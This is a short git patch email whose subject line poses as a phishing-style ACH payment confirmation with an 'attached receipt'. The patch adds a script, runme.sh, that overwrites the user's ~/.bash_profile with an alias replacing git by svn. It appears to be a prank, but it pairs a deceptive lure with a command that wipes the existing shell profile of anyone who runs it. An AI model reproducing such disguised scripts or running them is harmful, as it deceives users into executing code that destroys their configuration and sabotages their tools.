From 869a43b5ace11f531431b87161ca3f9a4af284c8 Mon Sep 17 00:00:00 2001 From: Karol Kozimor Date: Mon, 4 Mar 2013 00:49:07 +0100 Subject: [PATCH] ACH transaction is completed. $7835 has been successfully transferred. If the transaction was made by mistake please contact our customer service. Payment receipt is attached. --- runme.sh | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 runme.sh diff --git a/runme.sh b/runme.sh new file mode 100644 index 0000000..cc6f1b1 --- /dev/null +++ b/runme.sh @@ -0,0 +1,3 @@ +#!/bin/sh + +echo "alias git=svn" > ~/.bash_profile